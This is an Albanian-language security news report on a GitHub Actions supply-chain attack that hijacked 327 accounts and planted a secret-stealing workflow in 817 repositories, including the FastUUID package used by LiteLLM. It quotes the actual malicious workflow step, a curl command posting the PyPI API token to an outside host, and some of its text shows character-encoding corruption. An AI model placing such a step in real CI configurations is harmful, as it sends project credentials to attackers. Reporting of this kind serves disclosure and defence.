Hulumtuesit nga kompania GitGuardian identifikuan një sulm masiv ndaj përdoruesve të GitHub, në të cilin u mor kontrolli mbi 327 llogari dhe u vendos një procesor i dëmshëm Github Action në 817 repozita. Sulmi çoi në rrjedhjen e 3325 sekreteve, të përdorura në sistemet e integrimit të vazhdueshëm dhe të transmetuara përmes variablave të mjedisit, duke përfshirë tokenat e aksesit në PyPI, GitHub, NPM, DockerHub dhe disa shërbime të tjera cloud.

GitHub Actions u jep mundësi zhvilluesve të kodit të bashkangjisin procesorë për automatizimin e operacioneve të ndryshme në GitHub. Për shembull, përmes GitHub Actions, mund të kryhen kontrolle dhe teste të caktuara gjatë kryerjes së komiteve ose të automatizohet përpunimi i Issues të reja. Procesori i dëmshëm u përhap nën emrin 'Github Actions Security' dhe përmbante në seksionin 'run' komandën 'curl', e cila dërgonte përmbajtjen e variablave të mjedisit në një host të jashtëm gjatë ekzekutimit të detyrave në mjedisin e integrimit të vazhdueshëm. Komiti i dëmshëm ishte shtuar nga llogaritë e mbajtësve të projekteve, të cilët, shumë mundësisht, ishin hakuar ose ishin bërë viktima të phishing.
Sulmi u zbulua pas analizĂ«s sĂ« aktiviteteve anormale tĂ« lidhura me paketĂ«n FastUUID, e cila ofron njĂ« ndĂ«rlidhje Python mbi bibliotekĂ«n Rust UUID. Paketa FastUUID, pĂ«r tĂ« cilĂ«n gjatĂ« javĂ«s sĂ« fundit janĂ« regjistruar pothuajse 1.2 milion shkarkime, pĂ«rdoret si njĂ« varĂ«si nĂ« projektin popullor LiteLLM, i cili ka mbi 5 milion shkarkime nĂ« javĂ« nĂ« PyPI. Analiza e ndryshimeve nĂ« repozitorin FastUUID tregoi se mĂ« 2 Shtator, mbajtĂ«si i projektit shtoi njĂ« komit me njĂ« procesor tĂ« ri Github Action, i cili pĂ«rmbante kodin pĂ«r tĂ« dĂ«rguar tokenin nĂ« repozitorin PyPI nĂ« njĂ« host tĂ« jashtĂ«m. â name: Github Actions Security run: | curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page
Problemi u identifikua para se agresorĂ«t tĂ« shfrytĂ«zonin tokenin e kapur â nuk janĂ« regjistruar publikime tĂ« ndryshimeve tĂ« dĂ«mshme ose varianteve tĂ« modifikuara tĂ« paketĂ«s nĂ« PyPI pĂ«r FastUUID. Ndryshime tĂ« ngjashme tĂ« Github Action janĂ« zbuluar gjithashtu nĂ« 816 repozita tĂ« tjera, pronarĂ«ve tĂ« tĂ« cilĂ«ve, si dhe administratĂ«s sĂ« PyPI, GitHub, NPM dhe DockerHub, u janĂ« dĂ«rguar njoftime. Deri mbrĂ«mjen e djeshme, komitetet e dĂ«mshme ishin anuluar nĂ« rreth 100 repozita. Aktualisht, nĂ« kĂ«rkim nĂ« GitHub, identifikohen 671 komitete me Github Action tĂ« dĂ«mshme.
Burimi: opennet.ru
